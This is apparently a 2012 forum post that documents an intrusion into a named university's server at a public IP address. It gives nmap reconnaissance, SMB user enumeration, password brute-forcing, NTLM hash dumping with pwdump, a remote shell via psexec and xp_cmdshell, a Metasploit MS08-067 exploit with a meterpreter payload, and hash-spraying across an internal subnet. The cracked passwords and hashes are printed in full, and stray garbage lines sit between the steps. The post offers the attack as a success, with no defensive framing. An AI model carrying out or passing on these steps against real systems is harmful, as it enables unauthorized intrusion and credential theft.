nmap+msf intrusion into Guangxi Normal University

Posted on 2012-12-4 12:46:42
Guangxi Normal University website: http://202.103.242.241/

root@bt:~# nmap -sS -sV 202.103.242.241

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00048s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows 2000 microsoft-ds
1025/tcp open  mstask        Microsoft mstask (task server - c:\winnt\system32\Mstask.exe)
1026/tcp open  msrpc         Microsoft Windows RPC
3372/tcp open  msdtc?
3389/tcp open  ms-term-serv?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
SF:(GetRequest,6,"hO\n\x000Z")%r(RTSPRequest,6,"hO\n\x000Z")%r(HTTPOptions
SF:,6,"hO\n\x000Z")%r(Help,6,"hO\n\x000Z")%r(SSLSessionReq,6,"hO\n\x000Z")
SF:%r(FourOhFourRequest,6,"hO\n\x000Z")%r(LPDString,6,"hO\n\x000Z")%r(SIPO
SF:ptions,6,"hO\n\x000Z");
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
Service Info: OS: Windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds
. I0 D( a% m, L  y, X3 W6 b: F$ g6 v5 Z( f9 [2 E* K
root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb    // list the SMB scan scripts
-rw-r--r-- 1 root root 44055 2011-07-09 07:36 smb-brute.nse
-rw-r--r-- 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
-rw-r--r-- 1 root root  4806 2011-07-09 07:36 smb-enum-domains.nse
-rw-r--r-- 1 root root  3475 2011-07-09 07:36 smb-enum-groups.nse
-rw-r--r-- 1 root root  7958 2011-07-09 07:36 smb-enum-processes.nse
-rw-r--r-- 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
-rw-r--r-- 1 root root  6014 2011-07-09 07:36 smb-enum-shares.nse
-rw-r--r-- 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
-rw-r--r-- 1 root root  1658 2011-07-09 07:36 smb-flood.nse
-rw-r--r-- 1 root root  2906 2011-07-09 07:36 smb-os-discovery.nse
-rw-r--r-- 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
-rw-r--r-- 1 root root  4362 2011-07-09 07:36 smb-security-mode.nse
-rw-r--r-- 1 root root  2311 2011-07-09 07:36 smb-server-stats.nse
-rw-r--r-- 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
-rw-r--r-- 1 root root  1429 2011-07-09 07:36 smbv2-enabled.nse
+ r4 Y( z6 i+ @; d
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-users.nse 202.103.242.241
// use the script to enumerate the account names that exist on the remote machine

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00038s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
Host script results:
| smb-enum-users:
|_  Domain: PG-F289F9A8EF3E; Users: Administrator, Guest, test, TsInternetUser    // scan result
Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-enum-shares.nse 202.103.242.241
// list the shares

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00035s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
Host script results:
| smb-enum-shares:
|   ADMIN$
|     Anonymous access: <none>
|   C$
|     Anonymous access: <none>
|   IPC$
|_    Anonymous access: READ
Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds
3 M% E: L6 L0 q$ [7 N* E5 _" s1 q$ R
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse 202.103.242.241
// obtain user passwords

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00041s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
Host script results:
| smb-brute:
|   administrator:<blank> => Login was successful
|_  test:123456 => Login was successful
Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds
( L! m' b/ l0 [: o
root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2    // grab the hashes
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
root@bt:~# nmap --script=smb-pwdump.nse --script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.0012s latency).
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
Host script results:
| smb-pwdump:
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2
Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds
' ?2 v3 }4 g+ @% @  U
C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test -p 123456 -e cmd.exe    // get a cmd shell

PsExec v1.55 - Execute processes remotely
Copyright (C) 2001-2004 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig

Windows 2000 IP Configuration

Ethernet adapter 本地连接:

Connection-specific DNS Suffix  . :
IP Address. . . . . . . . . . . . : 202.103.242.241
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 202.103.1.1

C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P "123456" -Q "exec master..xp_cmdshell 'net user' "    // log in remotely as sa and run a command
0 u' n0 A* t0 e) F
root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-check-vulns.nse 202.103.242.241    // check the target machine for vulnerabilities

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
Nmap scan report for bogon (202.103.242.241)
Host is up (0.00046s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
Host script results:
| smb-check-vulns:
|_  MS08-067: VULNERABLE
Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds
8 X8 \! K' b! R/ w. j. N! _, L
root@bt:~# msfconsole    // use the ms08-067 vulnerability in msf to overflow the target machine

msf > search ms08
msf > use exploit/windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) > show options
msf  exploit(ms08_067_netapi) > set RHOST 202.103.242.241
msf  exploit(ms08_067_netapi) > show payloads
msf  exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf  exploit(ms08_067_netapi) > exploit
meterpreter >
Background session 2? [y/N]  (ctrl+z)
msf  exploit(ms08_067_netapi) > sessions -l

root@bt:/usr/local/share/nmap/scripts# vim usernames.txt
test
administrator

root@bt:/usr/local/share/nmap/scripts# vim password.txt
44EFCE164AB921CAAAD3B435B51404EE

root@bt:/usr/local/share/nmap/scripts# nmap --script=smb-brute.nse --script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
// try logging in across the whole internal subnet with the usernames and the captured hash

Nmap scan report for 192.168.1.105
Host is up (0.00088s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
3372/tcp open  msdtc
3389/tcp open  ms-term-serv
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
Host script results:
| smb-brute:
|_  administrator:<blank> => Login was successful

5 N5 z$ E8 \- H+ y" r攻击成功,一个简单的msf+nmap攻击~~·
- B* m. \  `  G- J* u7 O  o9 V8 V7 R$ ]